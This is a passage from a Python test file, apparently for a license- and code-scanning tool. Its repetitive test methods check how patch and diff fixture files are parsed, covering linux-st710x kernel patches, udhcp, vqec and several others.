expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/fan_ctrl.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_hcd_stm_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/hcd_stm.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/hcd_stm.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_head_s_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/head.S.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/head.S.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_i2c_stm_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/i2c-stm.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/i2c-stm.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_i2c_stm_c_patch2(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/i2c-stm.c.patch2')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/i2c-stm.c.patch2.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_i2c_nostop_for_bitbanging_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/i2c_nostop_for_bitbanging.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/i2c_nostop_for_bitbanging.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_i2c_rate_normal_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/i2c_rate_normal.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/i2c_rate_normal.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_i2c_revert_to_117_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/i2c_revert_to_117.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/i2c_revert_to_117.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_if_ppp_h_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/if_ppp.h.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/if_ppp.h.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_inittmpfs_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/inittmpfs.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/inittmpfs.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_init_kconfig_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/init_Kconfig.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/init_Kconfig.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_init_main_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/init_main.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/init_main.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_ioremap_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/ioremap.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/ioremap.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_ipconfig_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/ipconfig.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/ipconfig.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_kernel_extable_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/kernel_extable.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/kernel_extable.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_kernel_resource_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/kernel_resource.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/kernel_resource.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_kexec_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/kexec.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/kexec.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_ksymhash_elflib_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/ksymhash_elflib.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/ksymhash_elflib.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_libata_sense_data_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/libata_sense_data.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/libata_sense_data.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_localversion_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/localversion.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/localversion.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_mach_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/mach.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/mach.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_marvell_88e3015_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/marvell_88e3015.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/marvell_88e3015.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_mb442_setup_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/mb442_setup.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/mb442_setup.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_mmu_context_h_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/mmu_context.h.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/mmu_context.h.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_motorola_make_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/motorola_make.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/motorola_make.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_motorola_rootdisk_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/motorola_rootdisk.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/motorola_rootdisk.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_namespace_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/namespace.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/namespace.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_nand_flash_based_bbt_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/nand_flash_based_bbt.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/nand_flash_based_bbt.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_nand_old_oob_layout_for_yaffs2_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/nand_old_oob_layout_for_yaffs2.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/nand_old_oob_layout_for_yaffs2.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_netconsole_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/netconsole.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/netconsole.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_netconsole_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/netconsole.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/netconsole.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_nfsroot_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/nfsroot.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/nfsroot.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_page_h_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/page.h.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/page.h.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_page_alloc_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/page_alloc.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/page_alloc.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_pgtable_h_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/pgtable.h.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/pgtable.h.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_phy_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/phy.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/phy.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_phy_h_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/phy.h.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/phy.h.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_phy_device_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/phy_device.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/phy_device.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_pid_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/pid.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/pid.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_pio_irq_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/pio-irq.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/pio-irq.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_pmb_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/pmb.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/pmb.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_process_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/process.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/process.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_sample_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/sample.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/sample.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_sched_cfs_v2_6_23_12_v24_1_mod_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/sched-cfs-v2.6.23.12-v24.1.mod.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/sched-cfs-v2.6.23.12-v24.1.mod.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_setup_stb7100_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/setup-stb7100.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/setup-stb7100.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_setup_stx7105_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/setup-stx7105.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/setup-stx7105.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_setup_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/setup.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/setup.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_sh_kernel_setup_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/sh_kernel_setup.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/sh_kernel_setup.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_sh_ksyms_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/sh_ksyms.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/sh_ksyms.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_smsc_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/smsc.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/smsc.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_smsc_makefile_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/smsc_makefile.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/smsc_makefile.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_soc_h_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/soc.h.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/soc.h.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_squashfs3_3_revert_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/squashfs3.3_revert.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/squashfs3.3_revert.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_squashfs3_3_revert1_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/squashfs3.3_revert1.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/squashfs3.3_revert1.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_squashfs3_3_revert2_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/squashfs3.3_revert2.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/squashfs3.3_revert2.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_squashfs3_3_revert3_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/squashfs3.3_revert3.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/squashfs3.3_revert3.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_squashfs3_4_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/squashfs3.4.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/squashfs3.4.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_stasc_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/stasc.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/stasc.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_stmmac_main_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/stmmac_main.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/stmmac_main.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_suppress_igmp_report_listening_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/suppress_igmp_report_listening.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/suppress_igmp_report_listening.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_time_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/time.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/time.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_unionfs_2_5_1_for_2_6_23_17_diff(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/unionfs-2.5.1_for_2.6.23.17.diff')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/unionfs-2.5.1_for_2.6.23.17.diff.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_unionfs_remove_debug_printouts_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/unionfs_remove_debug_printouts.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/unionfs_remove_debug_printouts.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_vip19x0_vidmem_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/vip19x0_vidmem.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/vip19x0_vidmem.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_vip19x3_board_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/vip19x3_board.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/vip19x3_board.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_vip19xx_h_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/vip19xx.h.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/vip19xx.h.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_vip19xx_nand_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/vip19xx_nand.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/vip19xx_nand.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_vip19xx_nor_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/vip19xx_nor.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/vip19xx_nor.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_vt_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/vt.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/vt.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_yaffs2_2008_07_15_for_2_6_23_17_yaffs_guts_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/yaffs2-2008.07.15_for_2.6.23.17-yaffs_guts.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/yaffs2-2008.07.15_for_2.6.23.17-yaffs_guts.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_yaffs2_2008_07_15_for_2_6_23_17_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/yaffs2-2008.07.15_for_2.6.23.17.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/yaffs2-2008.07.15_for_2.6.23.17.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_npapi_patches_npapi_h_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/npapi/patches/npapi.h.patch')
expected_file = self.get_test_loc('patch/patches/misc/npapi/patches/npapi.h.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_openssl_0_9_8_patches_configure_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/openssl-0.9.8/patches/Configure.patch')
expected_file = self.get_test_loc('patch/patches/misc/openssl-0.9.8/patches/Configure.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_sqlite_patches_permissions_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/sqlite/patches/permissions.patch')
expected_file = self.get_test_loc('patch/patches/misc/sqlite/patches/permissions.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_udhcp_0_9_8_patch_arpping_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/udhcp-0.9.8/patch/arpping.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/udhcp-0.9.8/patch/arpping.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_udhcp_0_9_8_patch_clientpacket_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/udhcp-0.9.8/patch/clientpacket.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/udhcp-0.9.8/patch/clientpacket.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_udhcp_0_9_8_patch_clientpacket_h_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/udhcp-0.9.8/patch/clientpacket.h.patch')
expected_file = self.get_test_loc('patch/patches/misc/udhcp-0.9.8/patch/clientpacket.h.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_udhcp_0_9_8_patch_debug_h_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/udhcp-0.9.8/patch/debug.h.patch')
expected_file = self.get_test_loc('patch/patches/misc/udhcp-0.9.8/patch/debug.h.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_udhcp_0_9_8_patch_dhcpc_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/udhcp-0.9.8/patch/dhcpc.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/udhcp-0.9.8/patch/dhcpc.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_udhcp_0_9_8_patch_dhcpc_h_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/udhcp-0.9.8/patch/dhcpc.h.patch')
expected_file = self.get_test_loc('patch/patches/misc/udhcp-0.9.8/patch/dhcpc.h.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_udhcp_0_9_8_patch_dhcpd_h_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/udhcp-0.9.8/patch/dhcpd.h.patch')
expected_file = self.get_test_loc('patch/patches/misc/udhcp-0.9.8/patch/dhcpd.h.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_udhcp_0_9_8_patch_makefile_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/udhcp-0.9.8/patch/Makefile.patch')
expected_file = self.get_test_loc('patch/patches/misc/udhcp-0.9.8/patch/Makefile.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_udhcp_0_9_8_patch_options_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/udhcp-0.9.8/patch/options.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/udhcp-0.9.8/patch/options.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_udhcp_0_9_8_patch_options_h_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/udhcp-0.9.8/patch/options.h.patch')
expected_file = self.get_test_loc('patch/patches/misc/udhcp-0.9.8/patch/options.h.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_udhcp_0_9_8_patch_packet_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/udhcp-0.9.8/patch/packet.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/udhcp-0.9.8/patch/packet.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_udhcp_0_9_8_patch_packet_h_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/udhcp-0.9.8/patch/packet.h.patch')
expected_file = self.get_test_loc('patch/patches/misc/udhcp-0.9.8/patch/packet.h.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_udhcp_0_9_8_patch_route_patch1(self):
test_file = self.get_test_loc(u'patch/patches/misc/udhcp-0.9.8/patch/route.patch1')
expected_file = self.get_test_loc('patch/patches/misc/udhcp-0.9.8/patch/route.patch1.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_udhcp_0_9_8_patch_script_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/udhcp-0.9.8/patch/script.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/udhcp-0.9.8/patch/script.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_udhcp_0_9_8_patch_t1t2_patch1(self):
test_file = self.get_test_loc(u'patch/patches/misc/udhcp-0.9.8/patch/t1t2.patch1')
expected_file = self.get_test_loc('patch/patches/misc/udhcp-0.9.8/patch/t1t2.patch1.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_vqec_patch_build_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/vqec/patch/BUILD.patch')
expected_file = self.get_test_loc('patch/patches/misc/vqec/patch/BUILD.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_vqec_patch_cross_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/vqec/patch/cross.patch')
expected_file = self.get_test_loc('patch/patches/misc/vqec/patch/cross.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_vqec_patch_uclibc_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/vqec/patch/uclibc.patch')
expected_file = self.get_test_loc('patch/patches/misc/vqec/patch/uclibc.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_vqec_patch_vqec_ifclient_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/vqec/patch/vqec_ifclient.patch')
expected_file = self.get_test_loc('patch/patches/misc/vqec/patch/vqec_ifclient.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_vqec_patch_vqec_wv_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/vqec/patch/vqec_wv.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/vqec/patch/vqec_wv.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_vqec_patch_vqec_wv_h_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/vqec/patch/vqec_wv.h.patch')
expected_file = self.get_test_loc('patch/patches/misc/vqec/patch/vqec_wv.h.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_postgrey_1_30_group_patch(self):
test_file = self.get_test_loc(u'patch/patches/postgrey-1.30-group.patch')
expected_file = self.get_test_loc('patch/patches/postgrey-1.30-group.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_windows_drupal_upload_patch(self):
test_file = self.get_test_loc(u'patch/patches/windows/drupal_upload.patch')
expected_file = self.get_test_loc('patch/patches/windows/drupal_upload.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_windows_ether_patch_1_patch(self):
test_file = self.get_test_loc(u'patch/patches/windows/ether_patch_1.patch')
expected_file = self.get_test_loc('patch/patches/windows/ether_patch_1.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_windows_js_delete_patch(self):
test_file = self.get_test_loc(u'patch/patches/windows/js_delete.patch')
expected_file = self.get_test_loc('patch/patches/windows/js_delete.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_windows_plugin_explorer_patch(self):
test_file = self.get_test_loc(u'patch/patches/windows/plugin explorer.patch')
expected_file = self.get_test_loc('patch/patches/windows/plugin explorer.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_windows_resolveentity32_patch(self):
